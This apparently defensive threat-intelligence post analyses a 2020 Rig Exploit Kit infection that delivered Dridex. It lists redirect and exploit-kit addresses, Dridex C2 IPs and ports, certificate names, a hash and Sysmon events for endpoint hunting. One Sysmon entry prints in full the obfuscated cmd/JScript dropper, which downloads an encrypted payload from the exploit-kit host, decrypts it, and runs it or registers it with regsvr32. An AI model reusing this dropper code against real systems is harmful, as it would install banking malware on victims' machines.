Rig Exploit Kit delivers Dridex

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2020-02-15-Rig-EK-Dridex-pcap.zip


ASSOCIATED DOMAINS:

185.220.35.26 – cryptomoneyinside.xyz GET /zSkNkBHX?cpm_id=372833758&cpm_cost=0.0028 – Redirect to Rik EK
91.210.170.30 – GET /?MTY3NjE2&CiIe&uluBlX=abettor&dAm=callous&jVh=irreverent – Rig Exploit Kit
107.170.158.58 Port 1443 – Dridex C2
ofllpaica oungrei corp. – Dridex SSL Certificate Authority
54.38.143.246 Port 691 – Dridex C2
tamagorr sanipa eurl – Dridex SSL Certificate Authority
92.38.128.47 Port 3389 – Dridex C2
watbeq rstesus sf. – Dridex SSL Certificate Authority
109.123.107.19 Port 443 – Dridex C2
ocascotof pty. – Dridex SSL Certificate Authority

 

IMAGES AND DETAILS:

Shown above: Network traffic associated with Rig Exploit Kit and Dridex C2

 

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[Sysmon Event Type 1 – Process Creation]
Image C:\Windows\System32\cmd.exe

Description Windows Command Processor
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine cMd.exe /q /c cd /d “%%temp%%” && echo function Qsdfsd(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGe”,u=function(x){return E.split(“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+=”tTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “;var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,L=WScript[u(14)],v=u(9),m=WScript[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00″)+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DaSDADAD123ASD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Qsdfsd(d.responseText,g(n))};>o.txt && stArT wsCripT //B //E:JScript o.txt “vcbdf45” “http://91.210.170.30/?MjkwNDk3&mYqBpCod&huoZTYZJQ=disagree&rapLdIf=border&t4gff4=gOVV0V8a__20aHnx-fgJCD_B3bYQwT-ZuSFrg40VX0x7gTeMMgzhGBuGlRn-0tV1wW4A0QmKnOFqb58EYwV0UC&ymYRQIsGx=disagree&ojZpyKs=callous&typeQxUD=filly&cKVHt=callous&DJBQO=dinamic&CBor=callous&EbTEVRE=accelerator&MdoZbgPK=border&hfaMh=community&NuTNgaHy=irreverent&ffdgdfs=xHbQMrfYbRfFFYrfKPLEUKxEMUfWA06KwYiZhanVF5exFD_Gpbv1FxTspVudCFWEmvtvdLQHIwWh1UPASwximI&iRdiyBlQUNTkwNDEx” “¤”
CurrentDirectory C:\Users\Jake\Desktop\
User Jake-PC\Jake
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe” SCODEF:984 CREDAT:144385 /prefetch:2

[Sysmon Event Type 1 – Process Creation]
Image C:\Users\Jake\AppData\Local\Temp\rad5BB70.tmp.exe
FileVersion 1.0.0.5
Description Advanced SystemCare MonitorDisk
Product Advanced SystemCare
Company IObit
CommandLine rad5BB70.tmp.exe
CurrentDirectory C:\Users\Jake\AppData\Local\Temp\
User Jake-PC\Jake
MALWARE Hashes MD5=D7A59D318F9F9C9CD81CF84A4746364E,SHA256=9ABA3BF208092EFBC3B9E3FDA8C276319B369D3C9F1E6545EEB05D698B64430E
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c rad5BB70.tmp.exe

[Sysmon Event Type 3 – Process Network Communication]
Image C:\Users\Jake\AppData\Local\Temp\rad5BB70.tmp.exe
User Jake-PC\Jake
Protocol tcp
SourceIp 192.168.2.8
DestinationIp 107.170.158.58
DestinationHostname
DestinationPort 1443
DestinationPortName

[Sysmon Event Type 3 – Process Network Communication]
Image C:\Users\Jake\AppData\Local\Temp\rad80D4A.tmp.exe
User Jake-PC\Jake
Protocol tcp
SourceIp 192.168.2.8
DestinationIp 92.38.128.47
DestinationHostname
DestinationPort 3389
DestinationPortName ms-wbt-server

VirusTotal Link:
https://www.virustotal.com/gui/file-analysis/ZDdhNTlkMzE4ZjlmOWM5Y2Q4MWNmODRhNDc0NjM2NGU6MTU4MTgwODU3Ng==/detection